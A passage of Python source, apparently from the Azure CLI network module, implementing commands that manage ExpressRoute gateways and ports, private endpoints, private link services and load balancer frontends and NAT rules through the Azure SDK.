def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
    if min_val or max_val:
        gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
                bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min_val, max=max_val))
    if tags is not None:
        instance.tags = tags
    if min_val is not None:
        _ensure_autoscale()
        instance.auto_scale_configuration.bounds.min = min_val
    if max_val is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
    elif not basename.endswith('.pdf'):
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
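    # The service returns the letter of authorization as base64-encoded PDF content; decode it and
    # write the raw bytes to the resolved file path.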
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
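    # The long 'Components1Jq1T4ISchemas...' name appears to be the autogenerated model for the
    # user-assigned identity value; the identity map keys are user-assigned identity resource IDs and
    # the values are empty placeholder objects.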
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None, custom_interface_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
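    # Connections requested with a manual request must be approved by the private link service owner,
    # so they go into manual_private_link_service_connections; otherwise the connection is submitted
    # for automatic approval.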
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
if cmd.supported_api_version(min_api='2021-05-01') and custom_interface_name:
private_endpoint.custom_network_interface_name = custom_interface_name
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name,
ip_config_name=None, group_id=None, member_name=None, private_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
PrivateEndpointIPConfiguration = cmd.get_models("PrivateEndpointIPConfiguration")
ip_config = PrivateEndpointIPConfiguration(
name=ip_config_name,
group_id=group_id,
member_name=member_name,
private_ip_address=private_ip_address
)
private_endpoint.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def remove_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
ip_config = None
for item in private_endpoint.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None:
logger.warning("IP Configuration %s doesn't exist.", ip_config_name)
return private_endpoint
private_endpoint.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def list_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
return private_endpoint.ip_configurations
def add_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name, application_security_group_id=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
ApplicationSecurityGroup = cmd.get_models("ApplicationSecurityGroup")
asg = ApplicationSecurityGroup(id=application_security_group_id)
try:
private_endpoint.application_security_groups.append(asg)
except AttributeError:
private_endpoint.application_security_groups = [asg]
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def remove_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name, application_security_group_id):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
asg = None
for item in private_endpoint.application_security_groups:
if item.id == application_security_group_id:
asg = item
break
if asg is None:
logger.warning("Application security group %s doesn't exist.", application_security_group_id)
return private_endpoint
private_endpoint.application_security_groups.remove(asg)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def list_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
return private_endpoint.application_security_groups
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
        visibility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
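    # Standard SKU public IPs only support static allocation, so default accordingly when the caller
    # does not pick an allocation method.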
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
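    # Validation-only path: ask Resource Manager to validate the generated template without deploying.
    # On newer resource API versions, validation is itself a long-running operation.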
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, backend_port, frontend_port=None,
frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_pool_name=None):
InboundNatRule, SubResource = cmd.get_models('InboundNatRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
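    # Port-range based NAT rules and backend-pool association are only understood by API version
    # 2021-03-01 and later, so attach these fields only when the API supports them.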
    if frontend_port_range_end and cmd.supported_api_version(min_api='2021-03-01'):
        new_rule.frontend_port_range_end = frontend_port_range_end
    if frontend_port_range_start and cmd.supported_api_version(min_api='2021-03-01'):
        new_rule.frontend_port_range_start = frontend_port_range_start
    if backend_pool_name and cmd.supported_api_version(min_api='2021-03-01'):
backend_pool_id = get_property(lb.backend_address_pools, backend_pool_name).id
new_rule.backend_address_pool = SubResource(id=backend_pool_id)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
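    # Public (subnet-less) frontend IP configurations may come back from GET with all three zones
    # populated; clearing the field lets the retrieved model be PUT back without the service
    # rejecting the update (see the issue linked above).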
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
    if frontend_port_range_start is not None and cmd.supported_api_version(min_api='2021-03-01'):
        instance.frontend_port_range_start = frontend_port_range_start
    if frontend_port_range_end is not None and cmd.supported_api_version(min_api='2021-03-01'):
instance.frontend_port_range_end = frontend_port_range_end
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
    if private_ip_address == '':
        # an empty string clears the address and switches allocation back to dynamic
        instance.private_ip_allocation_method = 'dynamic'
        instance.private_ip_address = None
    elif private_ip_address is not None:
        # an explicit address implies static allocation
        instance.private_ip_allocation_method = 'static'
        instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
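    # Expand a bare vnet name into a full resource ID under the current subscription and resource
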